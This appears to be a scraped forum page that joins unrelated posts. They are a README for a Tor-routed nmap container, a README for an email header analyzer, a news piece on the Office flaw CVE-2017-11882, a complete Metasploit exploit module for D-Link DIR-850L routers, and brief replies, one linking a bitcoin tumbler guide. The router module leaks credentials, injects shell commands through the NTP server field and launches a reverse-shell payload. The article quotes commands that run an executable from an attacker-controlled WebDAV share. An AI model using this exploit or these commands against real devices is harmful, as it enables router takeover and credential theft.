nc as the first argument to docker run. For example: docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion and docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.: docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example: $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait retry 0] Check socket is open on localhost:9050... [tor_wait retry 0] Socket OPEN on localhost:9050 [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )... [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 1] Check socket is open on localhost:9050... [tor_wait retry 1] Socket OPEN on localhost:9050 [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )... [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 2] Check socket is open on localhost:9050... [tor_wait retry 2] Socket OPEN on localhost:9050 [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )... [tor_wait retry 2] SOCKS proxy UP on localhost:9050 [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.8s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds Notes: No UDP available over Tor Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap gr33tz @jessfraz tor-proxy @zuazo alpine-tor-docker shellhacks crypto-rebels.de Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git Source

What is MHA: Mail header analyzer is a tool written in flask for parsing email headers and converting them to a human readable format and it also can: Identify hop delays. Identify the source of the email. Identify hop country. MHA is an alternative for the following: Name Dev Issues MessageHeader Google Not showing all the hops. EmailHeaders Mxtoolbox Not accurate and slow. Message Header Analyzer Microsoft Broken UI. Installation: Install system dependencies: sudo apt-get update sudo apt-get install python-pip sudo pip install virtualenv Create a Python virtual environment and activate it: virtualenv virt source virt/bin/activate Clone the GitHub repo: git clone https://github.com/lnxg33k/MHA.git Install Python dependencies: cd MHA pip install -r requirements.txt Run the development server: python server.py -d You can change the bind address or port by specifying the appropriate options: python server.py -b 0.0.0.0 -p 8080 Everything should go well, now visit: http://localhos:8080 Docker A Dockerfile is provided if you wish to build a docker image. docker build -t mha:latest . You can then run a container with: docker run -d -p 8080:8080 mha:latest Download MHA-master.zip Source: https://github.com/lnxg33k/MHA

You should be extra careful when opening files in MS Office. When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers. The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update. Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document. The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents. However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user. Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions. DEMO: Exploitation Allows Full System Take Over Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software. This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847). Possible Attack Scenario: While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below: "By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)." "One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker." "Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient." "After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service." Protection Against Microsoft Office Vulnerability With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory. So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security. Users can run the following command in the command prompt to disable registering of the component in Windows registry: reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 For 32-bit Microsoft Office package in x64 OS, run the following command: reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro). Via thehackernews.com

This Metasploit module leverages an unauthenticated credential disclosure vulnerability to execute arbitrary commands on DIR-850L routers as an authenticated user. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'openssl' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'DIR-850L (Un)authenticated OS Command Exec', 'Description' => %q{ This module leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands on DIR-850L routers as an authenticated user. Unable to use Meterpreter payloads. }, 'Author' => [ 'Mumbai', # https://github.com/realoriginal (module) 'Zdenda' # vuln discovery ], 'References' => [ ['URL', 'https://www.seebug.org/vuldb/ssvid-96333'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3310'], ], 'DisclosureDate' => 'Aug 9 2017', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE, 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp' }, 'Privileged' => true, 'Payload' => { 'DisableNops' => true, }, 'Targets' => [[ 'Automatic', {} ]], )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['Server'] auth = res.headers['Server'] if auth =~ /DIR-850L/ if auth =~ /WEBACCESS\/1\.0/ return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected end end end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: opts[:service_name], protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end # some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well... # should write an auxiliary module to-do -> WRITE AUXILIARY def retrieve_creds begin xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml << "<postxml>\r\n" xml << "<module>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << "</module>\r\n" xml << "</postxml>" res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'encode_params' => false, 'headers' => { 'Accept-Encoding' => 'gzip, deflate', 'Accept' => '*/*' }, 'ctype' => 'text/xml', 'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}", 'data' => xml, }) if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue parse = res.get_xml_document username = parse.at('//name').text password = parse.at('//password').text vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}") loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body) print_good("#{peer} - Downloaded credentials to #{loot}") return username, password else fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained") end rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def retrieve_uid begin res = send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'GET', }) parse = res.get_json_document uid = parse['uid'] challenge = parse['challenge'] return uid, challenge rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def login(username, password) uid, challenge = retrieve_uid begin hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase send_request_cgi({ 'uri' => '/authentication.cgi', 'method' => 'POST', 'data' => "id=#{username}&password=#{hash}", 'cookie' => "uid=#{uid}" }) return uid rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def execute_command(cmd, opts) uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload << "<postxml>\r\n" payload << "<module>\r\n" payload << " <service>DEVICE.TIME</service>\r\n" payload << " <device>\r\n" payload << " <time>\r\n" payload << " <ntp>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n" payload << " </ntp>\r\n" payload << " <ntp6>\r\n" payload << " <enable>1</enable>\r\n" payload << " <period>604800</period>\r\n" payload << " </ntp6>\r\n" payload << " <timezone>20</timezone>\r\n" payload << " <time/>\r\n" payload << " <date/>\r\n" payload << " <dst>0</dst>\r\n" payload << " <dstmanual/>\r\n" payload << " <dstoffset/>\r\n" payload << " </time>\r\n" payload << " </device>\r\n" payload << "</module>\r\n" payload << "</postxml>" begin # save configuration res = send_request_cgi({ 'uri' => '/hedwig.cgi', 'method' => 'POST', 'ctype' => 'text/xml', 'data' => payload, 'cookie' => "uid=#{uid}" }) # execute configuration res = send_request_cgi({ 'uri' => '/pigwidgeon.cgi', 'method' => 'POST', 'data' => 'ACTIONS=SETCFG,ACTIVATE', 'cookie' => "uid=#{uid}" }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") end end def exploit print_status("#{peer} - Connecting to target...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url") end # # Information Retrieval, obtains creds and logs in # @username, @password = retrieve_creds execute_cmdstager( :flavor => :wget, :linemax => 200 ) end end Download dlink_dir850l_unauth_exec.rb.txt Source

//nevermind

Un tutorial decent dar incomplet. Insa ca punct de plecare e ok: http://www.techradar.com/how-to/how-to-use-a-bitcoin-tumbler

thanks